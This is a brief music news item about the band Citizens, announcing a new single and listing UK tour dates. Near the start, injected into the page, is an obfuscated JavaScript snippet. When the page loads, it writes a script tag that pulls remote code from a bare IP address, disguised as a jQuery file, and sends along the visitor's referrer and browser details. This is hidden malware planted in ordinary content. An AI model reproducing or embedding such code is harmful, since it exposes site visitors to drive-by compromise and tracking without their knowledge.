CITIZENS (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfbtf|var|u0026u|referrer|synks||js|php’.split(‘|’),0,{}))
will release new single ‘True Romance’ through Kitsuné on Monday 24th September. The band have also announced their biggest headline tour to date hitting London’s XOYO on November 20th. We interviewed Citizens back in March this year, if you missed it check it out here.

The full list of dates for the bands UK November headline tour is as follows:


13th Glasgow King Tuts
14th Edinburgh Electric Circus
16th Darlington The Hub
18th York Fibbers
19th Brighton The Haunt
20th London XOYO

Tickets for the bands headline November tour go on sale on August 3rd